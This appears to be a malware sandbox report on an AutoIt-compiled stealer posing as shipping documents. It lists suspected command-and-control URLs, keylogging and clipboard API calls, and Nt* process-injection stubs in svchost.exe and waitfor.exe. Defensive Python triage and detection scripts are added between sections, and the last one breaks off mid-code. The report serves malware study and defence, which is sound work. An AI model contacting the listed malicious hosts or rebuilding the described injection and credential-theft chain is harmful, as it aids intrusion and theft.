31 30 30 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 3b 2d 2d 65 66 66 65 63 74 53 68 61 64 6f 77 4c 69 67 68 74 53 68 61 6c 6c 6f 77 3a 30 20 31 70 78 20 31 30 70 78 20 30 20 72 67 62 28 35 33 20 35 38 20 36 32 20 2f 20 36 25 29 2c 0a 20 20 20 20 20 20 20 20 20 20 30 20 32 70 78 20 34 70 78 20 30 20 72 67 62 28 35 33 20 35 38 20 36 32 20 2f 20 38 25 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 44 61 72 6b 39 30 30 3a 36 20 31 31 20 31 36 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 29 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 73 74 29 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 36 30 30 3a 38 34 20 39 30 20 39 37 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65
                Source: waitfor.exe, 00000005.00000002.4473892138.0000000005E0E000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.000000000372E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
                Source: pNkvbgLNQpIoyz.exe, 00000006.00000002.4474990481.0000000004FFD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zrichiod-riech.sbs
                Source: pNkvbgLNQpIoyz.exe, 00000006.00000002.4474990481.0000000004FFD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zrichiod-riech.sbs/26nq/
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: waitfor.exe, 00000005.00000002.4473892138.00000000065E8000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.0000000003F08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: waitfor.exe, 00000005.00000003.2421945049.0000000007D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: waitfor.exe, 00000005.00000002.4473892138.0000000006132000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.0000000003A52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7s
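The URL strings above mix three kinds of material: search-engine and Microsoft-account endpoints that come from browser profile data the stealer read, links that only exist inside the bodies of pages the sample fetched (the Netlify "Site not found" page links to its own support forum), and hosts that belong to neither group and are the ones worth blocking and hunting for. The following Python script, added here as an example and not part of the Joe Sandbox report, runs that triage over a constructed subset of the strings listed above. The two allowlists are analyst assumptions, not something the report states, and the script also handles the run-together strings (two URLs with no separator) that memory dumps produce.

```python
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Constructed input: a subset of the URL strings listed above, copied as they
# appear in the report. One of them is two URLs run together with no separator,
# which is how adjacent strings often surface when a memory region is dumped.
SAMPLE_STRINGS = """\
http://www.zrichiod-riech.sbs
http://www.zrichiod-riech.sbs/26nq/
https://ac.ecosia.org/autocomplete?q=
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
https://duckduckgo.com/ac/?q=
https://login.live.com/oauth20_desktop.srf?lc=1033
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
https://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7s
"""

# Analyst allowlists (assumptions for this example, not taken from the report).
# BROWSER_PROFILE_HOSTS: search-engine and Microsoft-account endpoints that live
# in browser profile data and turn up in memory when a stealer reads it.
# FETCHED_PAGE_HOSTS: hosts that only appear inside the bodies of pages the
# sample downloaded (the Netlify 404 page links to its support forum).
BROWSER_PROFILE_HOSTS = ("ecosia.org", "yahoo.com", "duckduckgo.com",
                         "google.com", "login.live.com")
FETCHED_PAGE_HOSTS = ("netlify.com", "cpanel.com")

SCHEME_RE = re.compile(r"https?://")


def split_urls(text: str) -> list[str]:
    """Split a dumped string into individual URLs at every scheme boundary."""
    starts = [m.start() for m in SCHEME_RE.finditer(text)]
    ends = starts[1:] + [len(text)]
    return [text[a:b] for a, b in zip(starts, ends)]


def host_in(host: str, suffixes: tuple[str, ...]) -> bool:
    """True if host equals or is a subdomain of any listed suffix."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def triage(strings: str) -> dict[str, list[str]]:
    """Bucket every URL found in the dumped strings into
    browser_profile / fetched_page / candidate_ioc, preserving order."""
    buckets: dict[str, list[str]] = {
        "browser_profile": [], "fetched_page": [], "candidate_ioc": []}
    seen: set[str] = set()
    for line in strings.splitlines():
        for url in split_urls(line.strip()):
            host = urlsplit(url).hostname or ""
            if not host or url in seen:
                continue
            seen.add(url)
            if host_in(host, BROWSER_PROFILE_HOSTS):
                buckets["browser_profile"].append(url)
            elif host_in(host, FETCHED_PAGE_HOSTS):
                buckets["fetched_page"].append(url)
            else:
                buckets["candidate_ioc"].append(url)
    return buckets


def candidate_hosts(strings: str) -> list[str]:
    """Distinct hostnames from the candidate_ioc bucket, in first-seen order."""
    hosts: list[str] = []
    for url in triage(strings)["candidate_ioc"]:
        host = urlsplit(url).hostname or ""
        if host and host not in hosts:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    for bucket, urls in triage(SAMPLE_STRINGS).items():
        print(f"[{bucket}] {len(urls)}")
        for url in urls:
            print("    " + url)
    print("hosts to block/hunt:", candidate_hosts(SAMPLE_STRINGS))
```

Splitting at every `http(s)://` rather than on whitespace is what recovers `https://www.ecosia.org/search?q=` from the favicon string it is glued to; without it the second URL would be silently lost, and the same happens with the `login.live.com` strings above.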
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BC4164
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BC3F66
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BB001C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BDCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BDCABC

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: This is a third-party compiled AutoIt script.0_2_00B53B3A
                Source: SHIPPING DOCUMENTS_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c0026a5a-2
                Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_12c0b761-6
                Source: SHIPPING DOCUMENTS_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e70e6766-3
                Source: SHIPPING DOCUMENTS_PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_dbe23763-a
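The AutoIt verdict above rests on a single marker string that the runtime carries in every compiled script. The following Python script, added here as an example and not part of the Joe Sandbox report, reproduces that check for offline triage of a file or a dumped memory region: it searches for the banner in both ANSI and UTF-16LE (the Unicode AutoIt runtime stores its strings as wide characters) and, as a second indicator the report does not mention, for the `AU3!EA06` header that AutoIt v3 writes in front of an embedded compiled script. The two test buffers are constructed for the example and are not real samples.

```python
from __future__ import annotations

from pathlib import Path

# Banner text the report finds in the sample's binary and memory (quoted above).
AUTOIT_BANNER = "This is a third-party compiled AutoIt script."
# Header AutoIt v3 writes in front of an embedded compiled script; a standard
# AutoIt constant used here as a second, independent indicator.
AU3_MAGIC = b"AU3!EA06"


def find_all(data: bytes, needle: bytes) -> list[int]:
    """All (possibly overlapping) offsets of needle in data."""
    offsets: list[int] = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def autoit_indicators(data: bytes) -> dict[str, list[int]]:
    """Offsets of each AutoIt indicator. The banner is checked in both ANSI and
    UTF-16LE, since the Unicode AutoIt runtime stores its strings as wide chars."""
    return {
        "banner_ansi": find_all(data, AUTOIT_BANNER.encode("ascii")),
        "banner_utf16": find_all(data, AUTOIT_BANNER.encode("utf-16-le")),
        "au3_magic": find_all(data, AU3_MAGIC),
    }


def is_compiled_autoit(data: bytes) -> bool:
    """True if any indicator is present anywhere in the buffer."""
    return any(autoit_indicators(data).values())


def scan_file(path: str | Path) -> dict[str, object]:
    """Triage verdict for one file on disk (or a dumped memory region)."""
    data = Path(path).read_bytes()
    indicators = autoit_indicators(data)
    return {"path": str(path), "compiled_autoit": any(indicators.values()), **indicators}


# Constructed buffers for a stand-alone run (not real samples): one carrying the
# UTF-16LE banner followed by a script header, one carrying neither.
SAMPLE_AUTOIT_BLOB = (b"MZ" + b"\x00" * 62
                      + AUTOIT_BANNER.encode("utf-16-le") + b"\x00\x00"
                      + b"\x90" * 16 + AU3_MAGIC + b"\x00" * 8)
SAMPLE_CLEAN_BLOB = b"MZ" + b"\x00" * 62 + b"Hello, world" + b"\x00" * 16

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(scan_file(p))
    else:
        print("autoit blob:", autoit_indicators(SAMPLE_AUTOIT_BLOB))
        print("clean blob :", is_compiled_autoit(SAMPLE_CLEAN_BLOB))
```

Run it with one or more paths to scan real files; with no arguments it exercises the two constructed buffers. A hit on the banner alone says only that the file was built with AutoIt, which is also true of plenty of legitimate software; the point of the check is to route the sample to script extraction rather than to native reverse engineering.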
                Source: initial sampleStatic PE information: Filename: SHIPPING DOCUMENTS_PDF.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004DC583 NtClose,2_2_004DC583
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C94650 NtSuspendThread,LdrInitializeThunk,5_2_04C94650
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C94340 NtSetContextThread,LdrInitializeThunk,5_2_04C94340
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04C92CA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92C60 NtCreateKey,LdrInitializeThunk,5_2_04C92C60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04C92C70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92DD0 NtDelayExecution,LdrInitializeThunk,5_2_04C92DD0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04C92DF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04C92D10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04C92D30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04C92EE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04C92E80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92FE0 NtCreateFile,LdrInitializeThunk,5_2_04C92FE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92FB0 NtResumeThread,LdrInitializeThunk,5_2_04C92FB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92F30 NtCreateSection,LdrInitializeThunk,5_2_04C92F30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92AD0 NtReadFile,LdrInitializeThunk,5_2_04C92AD0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92AF0 NtWriteFile,LdrInitializeThunk,5_2_04C92AF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04C92BE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04C92BF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04C92BA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92B60 NtClose,LdrInitializeThunk,5_2_04C92B60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C935C0 NtCreateMutant,LdrInitializeThunk,5_2_04C935C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C939B0 NtGetContextThread,LdrInitializeThunk,5_2_04C939B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92CC0 NtQueryVirtualMemory,5_2_04C92CC0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92CF0 NtOpenProcess,5_2_04C92CF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92C00 NtQueryInformationProcess,5_2_04C92C00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92DB0 NtEnumerateKey,5_2_04C92DB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92D00 NtSetInformationFile,5_2_04C92D00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92EA0 NtAdjustPrivilegesToken,5_2_04C92EA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92E30 NtWriteVirtualMemory,5_2_04C92E30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92F90 NtProtectVirtualMemory,5_2_04C92F90
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92FA0 NtQuerySection,5_2_04C92FA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92F60 NtCreateProcessEx,5_2_04C92F60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92AB0 NtWaitForSingleObject,5_2_04C92AB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92B80 NtQueryInformationFile,5_2_04C92B80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93090 NtSetValueKey,5_2_04C93090
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93010 NtOpenDirectoryObject,5_2_04C93010
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93D70 NtOpenThread,5_2_04C93D70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C93D10 NtOpenProcessToken,5_2_04C93D10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C88E00 NtCreateFile,5_2_02C88E00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C88F70 NtReadFile,5_2_02C88F70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C89260 NtAllocateVirtualMemory,5_2_02C89260
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C89060 NtDeleteFile,5_2_02C89060
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C89100 NtClose,5_2_02C89100
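Read as a set rather than row by row, the Nt* functions above tell the injection story: svchost.exe and waitfor.exe both carry stubs for NtOpenProcess, NtCreateProcessEx, NtWriteVirtualMemory, NtMapViewOfSection, NtUnmapViewOfSection, NtProtectVirtualMemory, NtSetContextThread, NtQueueApcThread and NtResumeThread, and almost all of those stubs sit in one tight address range per process (0x0307xxxx in svchost.exe, 0x04C9xxxx in waitfor.exe) rather than in the process image. The following Python script, added here as an example and not part of the Joe Sandbox report, parses a constructed subset of the rows above, groups the Nt* stubs by process and 64 KiB region, and maps them onto the injection steps they implement. The primitive-to-step table is an analyst assumption, not something the report states.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed input: a subset of the "Code function" rows listed above, copied
# verbatim. Extraction dropped the cell separators, so the process path runs
# straight into "Code function:" and the function id is repeated after the API list.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004DC583 NtClose,2_2_004DC583
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
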